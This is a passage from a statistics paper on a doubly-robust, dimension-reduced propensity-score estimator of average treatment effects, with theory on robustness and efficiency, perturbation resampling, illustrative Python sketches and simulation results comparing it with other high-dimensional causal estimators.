for some \emph{unknown} link function $\widetilde{g}_{\pi}(\cdot)$ and unknown $\boldsymbol\alpha \in\mathbb{R}^{p}$, \emph{and} $\mathbf{X}$ are known to be elliptically distributed such that $\mathbb E(\boldsymbol a^{\sf \tiny T}\mathbf{X}\mid \boldsymbol\alpha_*^{\sf \tiny T}\mathbf{X})$ exists and is linear in $\boldsymbol\alpha_*^{\sf \tiny T}\mathbf{X}$, where $\boldsymbol\alpha_*$ denotes the true $\boldsymbol\alpha$ (e.g. if $\mathbf{X}$ is multivariate normal). Then, using the results of \cite{li1989regression}, it can be shown that $\bar{\boldsymbol\alpha}=c\boldsymbol\alpha_*$ for some scalar $c$, so that conditioning on $\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}$ is equivalent to conditioning on $\boldsymbol\alpha_*^{\sf \tiny T}\mathbf{X}$. But since $\widehat{\pi}_k(\mathbf{x};\widehat{\boldsymbol\theta}_k)$ recovers $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k)=\mathbb P(T=k\mid\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x})$ asymptotically, it also recovers $\pi_k(\mathbf{x})$ under $\widetilde{\Mscr}_{\pi}$. Consequently, $\widehat{\Delta}$ is more than doubly-robust in that $\widehat{\Delta}-\Delta = O_p(n^{-1/2})$ under the larger model $\mathcal{M}_{\pi}\cup \widetilde{\Mscr}_{\pi}\cup\mathcal{M}_{\mu}$.
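The proportionality $\bar{\boldsymbol\alpha}=c\boldsymbol\alpha_*$ can be checked numerically. Below, data are generated from a complementary log-log PS (an ``unknown'' link from the logistic working model's perspective) with multivariate normal covariates, and a logistic fit approximately recovers the direction of $\boldsymbol\alpha_*$; the parameter values are hypothetical and the Newton solver is a bare-bones sketch:

```python
import numpy as np

def fit_logistic(X, t, iters=25):
    """Plain Newton-Raphson logistic regression with an intercept."""
    Z = np.column_stack([np.ones(len(t)), X])
    b = np.zeros(Z.shape[1])
    for _ in range(iters):
        p = 1 / (1 + np.exp(-Z @ b))
        # Newton step: H^{-1} * gradient of the log-likelihood
        b = b + np.linalg.solve((Z * (p * (1 - p))[:, None]).T @ Z,
                                Z.T @ (t - p))
    return b

rng = np.random.default_rng(2)
n = 40000
Sigma = 0.7 * np.eye(3) + 0.3                   # equicorrelated normal X
X = rng.multivariate_normal(np.zeros(3), Sigma, size=n)
alpha_star = np.array([0.8, -0.5, 0.3])
p_true = 1 - np.exp(-np.exp(X @ alpha_star))    # cloglog link, not logistic
t = rng.binomial(1, p_true)
# Fitted slopes divided elementwise by the truth: approximately constant c.
ratios = fit_logistic(X, t)[1:] / alpha_star
```

Despite the wrong link, the elementwise ratios should be nearly equal, illustrating that the misspecified fit still estimates the correct index direction.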
The same phenomenon also occurs when estimating $\boldsymbol\beta_k$ under misspecification of the link in \eqref{e:ormod}, if we do not assume $\boldsymbol\beta_0=\boldsymbol\beta_1$ and use a common model to estimate the $\boldsymbol\beta_k$'s. In this case, if $\widetilde{\Mscr}_{\mu}$ is an analogous model under which:
\begin{align*}
\mu_1(\mathbf{x}) = \widetilde{g}_{\mu,1}(\boldsymbol\beta_1^{\sf \tiny T}\mathbf{x}) \quad \text{ and } \quad \mu_0(\mathbf{x})=\widetilde{g}_{\mu,0}(\boldsymbol\beta_0^{\sf \tiny T}\mathbf{x})
\end{align*}
for some unknown link functions $\widetilde{g}_{\mu,0}(\cdot)$ and $\widetilde{g}_{\mu,1}(\cdot)$ and $\mathbf{X}$ are elliptically distributed, then $\widehat{\Delta}-\Delta = O_p(n^{-1/2})$ under the even larger model $\mathcal{M}_{\pi}\cup \widetilde{\Mscr}_{\pi} \cup \mathcal{M}_{\mu}\cup \widetilde{\Mscr}_{\mu}$. This does not hold when $\boldsymbol\beta_0=\boldsymbol\beta_1$ is assumed, as $T$ is binary so $(T,\mathbf{X}^{\sf \tiny T})^{\sf \tiny T}$ is not exactly elliptically distributed. But the result may still be expected to hold approximately when $\mathbf{X}$ is elliptically distributed.
\subsection{Efficiency}
In terms of efficiency,
let the terms contributed to the influence function for $\widehat{\Delta}$ when $\boldsymbol\alpha$ and $\boldsymbol\beta_k$ are known be:
\begin{align}
\varphi_{i,k} = \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)} - \left\{ \frac{I(T_i = k)}{\pi_k(\mathbf{X}_i;\bar{\boldsymbol\theta}_k)}-1\right\}\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i,\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i,T_i =k ) -\bar{\mu}_k.
\end{align}
Under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$, $\varphi_{i,k}$ is the full influence function for $\widehat{\Delta}$. This influence function is the efficient influence function for $\Delta^*$ under $\mathcal{M}_{np}$ since $\mathbb E(Y_i \mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x},T_i=k)=\mu_k(\mathbf{x})$ and $\pi_k(\mathbf{x};\bar{\boldsymbol\theta}_k)=\pi_k(\mathbf{x})$ for all $\mathbf{x}\in\mathcal{X}$ at distributions for $\mathbb P$ belonging to $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$. An important consequence of this is that $\widehat{\Delta}$ reaches the semiparametric efficiency bound under $\mathcal{M}_{np}$, at distributions belonging to $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}$. That is, $\widehat{\Delta}$ is also a \emph{locally semiparametric efficient} estimator under $\mathcal{M}_{np}$.
In addition, based on the same arguments as in the preceding subsection, the local efficiency property could potentially be broadened so that $\widehat{\Delta}$ is locally efficient at distributions for $\mathbb P$ belonging to $(\mathcal{M}_{\pi} \cup \widetilde{\Mscr}_{\pi})\cap (\mathcal{M}_{\mu} \cup \widetilde{\Mscr}_{\mu})$.
Beyond this characterization of efficiency similar to that of $\widehat{\Delta}_{dr}$, there are additional benefits of $\widehat{\Delta}$ under model $\mathcal{M}_{\pi}\cap \mathcal{M}_{\mu}^c$. In this case, akin to $\widehat{\Delta}_{dr}$, estimating $\boldsymbol\beta_k$ does not contribute to the asymptotic variance since $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}=\boldsymbol 0$, and a similar $n^{1/2}\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}^{\sf \tiny T}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}}$ term is contributed from estimating $\boldsymbol\alpha$. The analogous term in the expansion for $\widehat{\Delta}_{dr}$ contributes to its influence function the negative of the projection of the preceding terms onto the linear span of the scores for $\boldsymbol\alpha$ (restricted to $\mathcal{A}_{\boldsymbol\alpha}$). We show in Web Appendix D that the same interpretation can be adopted for $\widehat{\Delta}$.
\begin{theorem} \label{t:effgain}
Let $\mathbf{U}_{\boldsymbol\alpha}$ be the score for $\boldsymbol\alpha$ under $\mathcal{M}_{\pi}$ and let $[\mathbf{U}_{\boldsymbol\alpha,\mathcal{A}_{\boldsymbol\alpha}}]$ denote the linear span of its components indexed in $\mathcal{A}_{\boldsymbol\alpha}$. In the Hilbert space $\mathcal{L}_2^0$ of random variables with mean $0$ and finite variance, with inner product given by the covariance, let $\Pi\{ V \mid \mathcal{S}\}$ denote the projection of some $V\in \mathcal{L}_2^0$ into a subspace $\mathcal{S} \subseteq \mathcal{L}_2^0$. If the assumptions required for Theorem \ref{t:IFexp} hold, then, under $\mathcal{M}_{\pi}$, $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}^{\sf \tiny T} n^{1/2}(\widehat{\balph}-\bar{\boldsymbol\alpha})_{\mathcal{A}_{\boldsymbol\alpha}} = -n^{-1/2}\sum_{i=1}^n\Pi\{\varphi_{i,k}\mid[\mathbf{U}_{\boldsymbol\alpha,\mathcal{A}_{\boldsymbol\alpha}}]\} + o_p(1)$.
\end{theorem}
This result implies, through the Pythagorean theorem, the familiar efficiency paradox that, under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$, $\widehat{\Delta}$ is more efficient when $\boldsymbol\alpha$ is estimated than when the true $\boldsymbol\alpha$ is plugged in \citep{lunceford2004stratification}. Moreover, under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$, the influence function of $\widehat{\Delta}$ involves projecting
$\varphi_{i,k}$ rather than:
\begin{align*}
\phi_{i,k} = \frac{I(T_i =k)Y_i}{\pi_k(\mathbf{X}_i)} - \left\{ \frac{I(T_i = k)}{\pi_k(\mathbf{X}_i)}-1\right\}g_{\mu}(\bar{\beta}_{0} + \bar{\beta}_1 k+\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i) -\bar{\mu}_{k},
\end{align*}
which are the corresponding influence function terms for $\widehat{\Delta}_{dr}$. But since $\mathbb E(Y_i\mid \bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\alpha}^{\sf \tiny T}\mathbf{x},\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{X}_i=\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x},T_i =k)$ better approximates $\mu_k(\mathbf{x})$ than the limiting parametric model $g_{\mu}(\bar{\beta}_0 + \bar{\beta}_1 k +\bar{\boldsymbol\beta}_k^{\sf \tiny T}\mathbf{x})$, it can be shown that $\mathbb E(\phi_{i,k}^2)>\mathbb E(\varphi_{i,k}^2)$ for $k=0,1$. Given that under $\mathcal{M}_{\pi}\cap \mathcal{M}_{\mu}^c$ the influence functions of both $\widehat{\Delta}$ and $\widehat{\Delta}_{dr}$ are then in the form of a residual after projecting $\varphi_{i,k}$ and $\phi_{i,k}$, respectively, onto the same space, the asymptotic variance of $\widehat{\Delta}$ can be seen to be less than that of $\widehat{\Delta}_{dr}$. That is, $\widehat{\Delta}$ is more efficient than $\widehat{\Delta}_{dr}$ under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$.
We show in the simulation studies that this improvement can lead to substantial efficiency gains under $\mathcal{M}_{\pi} \cap \mathcal{M}_{\mu}^c$ in finite samples. These robustness and efficiency properties distinguish $\widehat{\Delta}$ from the usual doubly-robust estimators and their variants. Moreover, despite being motivated by data with high-dimensional $p$, these properties still hold if $p$ is small relative to $n$, which makes $\widehat{\Delta}$ effective in low-dimensional settings as well.
We next consider a perturbation scheme to estimate standard errors (SE) and confidence intervals (CI) for $\widehat{\Delta}$.
\section{Perturbation Resampling} \label{s:perturbation}
Although the asymptotic variance of $\widehat{\Delta}$ can be determined through its influence function specified in Theorem \ref{t:IFexp}, a direct empirical estimate based on the influence function is difficult because $\mathbf{u}_{k,\mathcal{A}_{\boldsymbol\alpha}}$ and $\mathbf{v}_{k,\mathcal{A}_{\boldsymbol\beta_k}}$ involve complicated functionals of $\mathbb P$ that are difficult to estimate. Instead we propose a simple perturbation-resampling procedure. Let $\mathcal{G} = \{ G_i : i=1,\ldots,n\}$ be a set of non-negative iid random variables with unit mean and variance that are independent of $\mathscr{D}$. The procedure then perturbs each ``layer'' of the estimation of $\widehat{\Delta}$. Let the perturbed estimates of $\vec{\balph}$ and $\vec{\boldsymbol\beta}$ be:
\begin{align*}
&(\widehat{\alpha}^*_0,\widehat{\balph}^{*\sf \tiny T})^{\sf \tiny T} = \argmin_{\vec{\balph}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\pi}(\vec{\balph};T_i,\mathbf{X}_i)G_i + p_{\pi}(\vec{\balph}_{\{-1\}}; \lambda_{n})\right\} \\
&(\widehat{\beta}^*_0,\widehat{\beta}^*_1,\widehat{\boldsymbol\beta}^{*\sf \tiny T}_0,\widehat{\boldsymbol\beta}^{*\sf \tiny T}_1)^{\sf \tiny T} = \argmin_{\vec{\boldsymbol\beta}}\left\{ - n^{-1}\sum_{i=1}^n \ell_{\mu}(\vec{\boldsymbol\beta};\mathbf{Z}_i)G_i + p_{\mu}(\vec{\boldsymbol\beta}_{\{-1\}};\lambda_{n})\right\}.
\end{align*}
The perturbed DiPS estimates are calculated by:
\begin{align}
\widehat{\pi}_k^*(\mathbf{x};\widehat{\boldsymbol\theta}_k^*)= \frac{\sum_{j=1}^nK_h\{(\widehat{\balph}^*,\widehat{\boldsymbol\beta}_k^*)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}I(T_j=k)G_j}{\sum_{j=1}^n K_h\{(\widehat{\balph}^*,\widehat{\boldsymbol\beta}_k^*)^{\sf \tiny T}(\mathbf{X}_j-\mathbf{x})\}G_j}, \text{ for } k=0,1.
\end{align}
Lastly the perturbed estimator is given by $\widehat{\Delta}^* = \widehat{\mu}_1^* - \widehat{\mu}_0^*$ where:
\begin{align*}
\widehat{\mu}_k^* = \left\{ \sum_{i=1}^n \frac{I(T_i = k)}{\widehat{\pi}_k^*(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k^*)}G_i\right\}^{-1}\left\{ \sum_{i=1}^n \frac{I(T_i = k)Y_i}{\widehat{\pi}_k^*(\mathbf{X}_i;\widehat{\boldsymbol\theta}_k^*)} G_i\right\}, \text{ for } k=0,1.
\end{align*}
It can be shown, based on arguments similar to those in \cite{tian2007model}, that the asymptotic distribution of $n^{1/2}(\widehat{\Delta} - \bar{\Delta})$ coincides with that of $n^{1/2}(\widehat{\Delta}^* - \widehat{\Delta}) \mid \mathscr{D}$. We can thus approximate the SE of $\widehat{\Delta}$ based on the empirical standard deviation or, as a robust alternative, the empirical mean absolute deviation (MAD) of a large number of resamples $\widehat{\Delta}^*$, and construct CIs using empirical percentiles of the resamples of $\widehat{\Delta}^*$.
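The resampling loop can be sketched as follows. For brevity this sketch perturbs only the final weighting layer with the PS held fixed, whereas the full procedure also reperturbs the regularized fits and the smoothing step; Exp(1) weights are one standard choice with unit mean and variance:

```python
import numpy as np

def perturb_se(y, t, ps1, B=200, seed=0):
    """Perturbation-resampling SE for the normalized IPW estimator,
    perturbing only the weighting layer. G_i ~ Exp(1) has unit mean and
    variance; sqrt(pi/2) converts the mean absolute deviation of the
    resamples to an SE under approximate normality."""
    rng = np.random.default_rng(seed)
    reps = np.empty(B)
    for b in range(B):
        g = rng.exponential(1.0, len(y))
        w1, w0 = g * t / ps1, g * (1 - t) / (1 - ps1)
        reps[b] = np.sum(w1 * y) / np.sum(w1) - np.sum(w0 * y) / np.sum(w0)
    return np.sqrt(np.pi / 2) * np.mean(np.abs(reps - np.mean(reps)))

# Demo: with a known PS of 0.5, the SE should be near 2*sigma/sqrt(n).
rng = np.random.default_rng(3)
n = 2000
t = rng.binomial(1, 0.5, n)
y = t + rng.normal(0.0, 1.0, n)
se = perturb_se(y, t, np.full(n, 0.5))
```

Percentile CIs follow by taking empirical quantiles of the resampled estimates instead of their dispersion.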
\section{Numerical Studies} \label{s:numerical}
\subsection{Simulation Study}
We performed extensive simulations to assess the finite sample bias and relative efficiency (RE) of $\widehat{\Delta}$ (DiPS) compared to alternative estimators. We also assessed in a separate set of simulations the performance of the perturbation procedure.
Adaptive LASSO was used to estimate $\boldsymbol\alpha$ and $\boldsymbol\beta_k$, and a Gaussian product kernel of order $q=4$ with a plug-in bandwidth at the optimal order (see \hyperref[s:discussion]{Discussion}) was used for smoothing. Alternative estimators include an IPW estimator with $\pi_k(\mathbf{x})$ estimated by adaptive LASSO (IPW-ALAS), $\widehat{\Delta}_{dr}$ with nuisances estimated by adaptive LASSO (DR-ALAS), the DR estimator with nuisance functions estimated by ``rigorous'' LASSO (DR-rLAS) of \cite{belloni2017program}, the outcome-adaptive LASSO (OAL) of \cite{shortreed2017outcome}, Group Lasso and Doubly Robust Estimation (GLiDeR) of \cite{koch2017covariate}, and the model-averaged double-robust (MADR) estimator of \cite{cefalu2017model}. OAL and GLiDeR were implemented with default settings from code provided in the Supplementary Materials of the respective papers. DR-rLAS was implemented using the \texttt{hdm} R package \citep{chernozhukov2016hdm} with default settings, and MADR was implemented using the \texttt{madr} package with $M=500$ MCMC iterations to reduce the computations. Throughout the numerical studies, unless noted otherwise, we postulated $g_{\pi}(u)=1/(1+e^{-u})$ for $\mathcal{M}_{\pi}$ and $g_{\mu}(u)=u$ with $\boldsymbol\beta_0=\boldsymbol\beta_1$ for $\mathcal{M}_{\mu}$ as the working models. For adaptive LASSO, the tuning parameter was chosen by the extended regularized information criterion \citep{hui2015tuning}, which showed good performance for variable selection. We re-fitted models with the selected covariates, as suggested in \cite{hui2015tuning}, to reduce bias.
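The order-$q=4$ kernel is not displayed in the text; one standard fourth-order Gaussian-based choice is $K(u)=\tfrac{1}{2}(3-u^2)\phi(u)$, whose defining moment conditions can be verified numerically (a sketch; the simulations may use a different construction):

```python
import numpy as np

def k4(u):
    """A fourth-order Gaussian-based kernel: (3 - u^2)/2 * phi(u)."""
    return 0.5 * (3.0 - u ** 2) * np.exp(-0.5 * u ** 2) / np.sqrt(2 * np.pi)

# Check the moment conditions defining a kernel of order 4 by quadrature:
# integral of K is 1, integral of u^2 K is 0, integral of u^4 K is nonzero.
u = np.linspace(-10.0, 10.0, 200001)
du = u[1] - u[0]
m0 = np.sum(k4(u)) * du
m2 = np.sum(u ** 2 * k4(u)) * du
m4 = np.sum(u ** 4 * k4(u)) * du   # equals -3 for this kernel
```

The vanishing second moment is what reduces the smoothing bias to $O(h^4)$, which the rate conditions on $h$ rely on.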
We focused on a continuous outcome in the simulations, generating the data according to:
\begin{align*}
\mathbf{X} \sim N(\boldsymbol 0,\Sigma), \quad T\mid \mathbf{X} \sim Ber\{ \pi_1(\mathbf{X})\}, \quad \text{ and } Y\mid \mathbf{X},T \sim N\{ \mu_T(\mathbf{X}), 10^2\},
\end{align*}
where $\Sigma = (\sigma^2_{ij})$ with $\sigma^2_{ij} = 1$ if $i=j$ and $\sigma^2_{ij} = .4(.5)^{\abs{i-j}/3} I(\abs{i-j} \leq 15)$ if $i\neq j$. The simulations were varied over scenarios where working models were correct or misspecified:
\begin{align*}
&\text{Both correct: } \pi_1(\mathbf{x}) = g_{\pi}(\boldsymbol\alpha^{\sf \tiny T}\mathbf{x}), \quad \mu_k(\mathbf{x}) = k + \boldsymbol\beta_k^{\sf \tiny T}\mathbf{x} \\
&\text{Misspecified $\mu_k(\mathbf{x})$: } \pi_1(\mathbf{x}) = g_{\pi}(\boldsymbol\alpha^{\sf \tiny T}\mathbf{x}), \quad \mu_k(\mathbf{x}) = k + 3\left\{ \boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x} (\boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x}+3)\right\}^{1/3} \\
&\text{Misspecified $\pi_k(\mathbf{x})$: } \pi_1(\mathbf{x}) = g_{\pi}\left\{-1+\boldsymbol\alpha_1^{\sf \tiny T}\mathbf{x}(.5\boldsymbol\alpha_2^{\sf \tiny T}\mathbf{x} + .5)\right\}, \quad \mu_k(\mathbf{x}) = k + \boldsymbol\beta_k^{\sf \tiny T}\mathbf{x} \\
&\text{Both misspecified: } \pi_1(\mathbf{x}) = g_{\pi}\left\{-1+\boldsymbol\alpha_1^{\sf \tiny T}\mathbf{x}(.5\boldsymbol\alpha_2^{\sf \tiny T}\mathbf{x} + .5)\right\}, \quad \mu_k(\mathbf{x}) = k + 3\left\{ \boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x} (\boldsymbol\beta_{k}^{\sf \tiny T}\mathbf{x}+3)\right\}^{1/3},
\end{align*}
where $\boldsymbol\alpha = (.4,-.3,.4,\mathbf{.3}_{2},.4,.3,-\mathbf{.3}_{3},\boldsymbol 0_{p-10})^{\sf \tiny T}$, $\boldsymbol\beta_0=\boldsymbol\beta_1=(-1,1,-1,\mathbf{1}_2,-1,\mathbf{1}_2,-\mathbf{1}_2,\boldsymbol 0_{p-10})^{\sf \tiny T}$, $\boldsymbol\alpha_{1} = (.9,0,-.9,0,.9,0,.9,0,-.9,0,\boldsymbol 0_{p-10})^{\sf \tiny T}$, and $\boldsymbol\alpha_{2} = (0,-.6,0,.6,0,.6,0,-.6,0,-.6,\boldsymbol 0_{p-10})^{\sf \tiny T}$, with $\mathbf{a}_{m}$ denoting a $1\times m$ vector with all elements equal to $a$. In the misspecified $\mu_k(\mathbf{x})$ scenario, $\mu_k(\mathbf{x})$ is actually a single-index model among subjects with either $T=1$ or $T=0$, which allows for complex nonlinearities and interactions. Nevertheless, this is a genuine misspecification of $\mu_k(\mathbf{x})$ (i.e. $\mathbb P$ would \emph{not} belong to $\widetilde{\Mscr}_{\mu}\cup \mathcal{M}_{\mu}$) because we assumed $\boldsymbol\beta_0=\boldsymbol\beta_1$ for $\mathcal{M}_{\mu}$. A double-index model is used for misspecifying $\pi_k(\mathbf{x})$ so that we consider the case where $\mathbb P$ would not belong to $\widetilde{\Mscr}_{\pi}\cup\mathcal{M}_{\pi}$. The simulations were run over $R=2,000$ repetitions.
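The ``both correct'' data-generating process above can be sketched as follows (shown for $p=15$, with the $\mathbf{a}_m$ blocks written out explicitly):

```python
import numpy as np

def make_sigma(p):
    """Covariance with unit diagonal and
    sigma2_ij = .4 * (.5)^{|i-j|/3} for 0 < |i-j| <= 15."""
    d = np.abs(np.arange(p)[:, None] - np.arange(p)[None, :])
    sigma = 0.4 * 0.5 ** (d / 3) * (d <= 15)
    np.fill_diagonal(sigma, 1.0)
    return sigma

def simulate(n, p, rng):
    """Draw (X, T, Y) under the 'both correct' scenario."""
    alpha = np.array([.4, -.3, .4, .3, .3, .4, .3, -.3, -.3, -.3]
                     + [0.0] * (p - 10))
    beta = np.array([-1, 1, -1, 1, 1, -1, 1, 1, -1, -1]
                    + [0.0] * (p - 10))
    X = rng.multivariate_normal(np.zeros(p), make_sigma(p), size=n)
    ps = 1 / (1 + np.exp(-X @ alpha))          # logistic PS
    T = rng.binomial(1, ps)
    Y = T + X @ beta + rng.normal(0, 10, n)    # mu_k(x) = k + beta'x
    return X, T, Y

rng = np.random.default_rng(4)
X, T, Y = simulate(5000, 15, rng)
```

Under this design the true ATE is $\Delta = 1$, since $\mu_1(\mathbf{x})-\mu_0(\mathbf{x})=1$ for every $\mathbf{x}$.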
Table \ref{tab:bias} presents the bias and root mean square error (RMSE) for $n=1,000, 5,000$ under the different specifications when $p=15$. Among the four scenarios considered, the bias for DiPS is small relative to the RMSE and generally diminishes to zero as $n$ increases, verifying its double-robustness. In contrast, IPW-ALAS and OAL rely on consistent estimates of the PS and show non-negligible bias under the ``misspecified $\pi_1(\mathbf{x})$'' scenario. The extra robustness of DiPS is evident under the ``both misspecified'' scenario, where most other estimators incur non-negligible bias. As the true outcome model is close to being a single-index model with elliptical covariates, DiPS still estimates the average treatment effect $\Delta$ with little bias. In results not shown, we also checked the bias for $p$ up to $p=75$, where we generally found similar patterns. DiPS incurred around 1-2\% more bias than other estimators when $n$ was small relative to $p$, which may be a consequence of smoothing in finite samples.
\begin{table}[htbp]
\scalebox{0.86}{
\begin{tabular}{rrcccccccc}
\toprule
& & \multicolumn{2}{c}{Both Correct} & \multicolumn{2}{c}{Misspecified $\mu_k(\mathbf{x})$} & \multicolumn{2}{c}{Misspecified $\pi_1(\mathbf{x})$} & \multicolumn{2}{c}{Both misspecified} \\
\multicolumn{1}{c}{\textbf{Size}} & \multicolumn{1}{c}{\textbf{Estimator}} & \textbf{Bias} & \textbf{RMSE} & \textbf{Bias} & \textbf{RMSE} & \textbf{Bias} & \textbf{RMSE} & \textbf{Bias} & \textbf{RMSE} \\ \hline
\multicolumn{1}{c}{\multirow{7}[2]{*}{n=1,000}} & \multicolumn{1}{c}{IPW-ALAS} & 0.009 & 0.279 & 0.001 & 0.414 & -0.117 & 0.312 & -0.019 & 0.434 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-ALAS} & -0.002 & 0.252 & -0.014 & 0.401 & 0.003 & 0.244 & 0.102 & 0.462 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-rLAS} & -0.057 & 0.275 & -0.092 & 0.426 & -0.022 & 0.284 & 0.021 & 0.438 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{OAL} & 0.002 & 0.263 & -0.013 & 0.403 & 0.013 & 0.283 & 0.109 & 0.459 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{GLiDeR} & -0.002 & 0.244 & -0.016 & 0.379 & 0.004 & 0.239 & 0.092 & 0.426 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{MADR} & -0.002 & 0.249 & -0.015 & 0.402 & 0.002 & 0.239 & 0.101 & 0.451 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DiPS} & 0.015 & 0.252 & 0.003 & 0.293 & 0.017 & 0.243 & -0.003 & 0.293 \\ \hline
\multicolumn{1}{c}{\multirow{7}[2]{*}{n=5,000}} & \multicolumn{1}{c}{IPW-ALAS} & -0.003 & 0.116 & 0.001 & 0.186 & -0.127 & 0.181 & -0.033 & 0.192 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-ALAS} & -0.003 & 0.110 & 0.002 & 0.184 & 0.000 & 0.107 & 0.093 & 0.216 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DR-rLAS} & -0.003 & 0.110 & 0.002 & 0.184 & 0.037 & 0.122 & 0.252 & 0.320 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{OAL} & -0.002 & 0.115 & 0.002 & 0.186 & -0.098 & 0.155 & 0.012 & 0.193 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{GLiDeR} & -0.003 & 0.108 & 0.001 & 0.180 & 0.000 & 0.108 & 0.098 & 0.217 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{MADR} & -0.003 & 0.110 & 0.002 & 0.184 & 0.000 & 0.107 & 0.094 & 0.217 \\
\multicolumn{1}{c}{} & \multicolumn{1}{c}{DiPS} & 0.005 & 0.109 & 0.008 & 0.117 & 0.005 & 0.106 & -0.002 & 0.118 \\
\bottomrule
\end{tabular}
}
\vspace{1.5em}
\caption{Bias and RMSE of estimators by $n$ and model specification scenario.
}
\label{tab:bias}
\end{table}
Figure \ref{fig:RE} presents the RE under the different scenarios for $n=1,000, 5,000$ and $p=15,30,75$. RE was defined as the mean square error (MSE) of DR-ALAS relative to that of each estimator, with RE $>1$ indicating greater efficiency compared to DR-ALAS. Under the ``both correct'' scenario many of the estimators have similar efficiency since they are variants of the doubly-robust estimator and are locally semiparametric efficient. DiPS is also no less efficient than other estimators under the ``misspecified $\pi_1(\mathbf{x})$'' scenario. On the other hand, efficiency gains of more than 100\% are achieved relative to other estimators when $n$ is large relative to $p$ under the ``misspecified $\mu_k(\mathbf{x})$'' scenario. This demonstrates that the efficiency gain resulting from Theorem \ref{t:effgain} can be substantial. The gains diminish with larger $p$ for a fixed $n$, as expected, but remain substantial even when $p=75$. Similar results occur under the ``both misspecified'' scenario, except that the efficiency gains for DiPS are even larger due to its additional robustness to misspecification in terms of bias.
\begin{figure}[h!]
\centering
\centerline{(a) Both correct}
\includegraphics[scale=.32]{fig1_a.png}
\includegraphics[scale=.32]{fig1_b.png}
\centerline{(b) Misspecified $\mu_k(\mathbf{x})$}
\includegraphics[scale=.32]{fig1_c.png}
\includegraphics[scale=.32]{fig1_d.png}
\centerline{(c) Misspecified $\pi_1(\mathbf{x})$}
\includegraphics[scale=.32]{fig1_e.png}
\includegraphics[scale=.32]{fig1_f.png}
\centerline{(d) Both misspecified}
\includegraphics[scale=.32]{fig1_g.png}
\includegraphics[scale=.32]{fig1_h.png}
\caption{\baselineskip=1pt RE relative to DR-ALAS by $n$, $p$, and specification scenario.
}
\label{fig:RE}%
\end{figure}
Table \ref{tab:cov} presents the performance of the perturbation procedure for DiPS when $p=15$ and $p=30$. SEs for DiPS were estimated using the MAD. The empirical SEs (Emp SE), calculated from the sample standard deviations of $\widehat{\Delta}$ over the simulation repetitions, were generally similar to the average of the SE estimates over the repetitions (ASE), despite some slight underestimation.
The coverage of the percentile CIs (Cover) was generally close to the nominal 95\%, with slight over-coverage in small samples that diminished with larger $n$.
\begin{table}[htbp]
\begin{tabular}{ccccc}
\toprule
\textbf{p} & \textbf{n} & \textbf{Emp SE} & \textbf{ASE} & \textbf{Cover} \\
\midrule
15 & 500 & 0.350 & 0.326 & 0.971 \\
15 & 1000 & 0.248 & 0.228 & 0.956 \\
15 & 2000 & 0.170 & 0.161 & 0.954 \\ \hline
30 & 500 & 0.351 & 0.330 & 0.973 \\
30 & 1000 & 0.248 & 0.230 & 0.963 \\
30 & 2000 & 0.174 & 0.161 & 0.950 \\
\bottomrule
\end{tabular}
\vspace{1.5em}
\caption{Perturbation performance under correctly specified models. Emp SE: empirical standard error over simulations, ASE: average of standard error estimates based on MAD over perturbations, Cover: Coverage of 95\% percentile intervals.}
\label{tab:cov}
\end{table}
\subsection{Data Example: Effect of Statins on Colorectal Cancer Risk in EMRs}
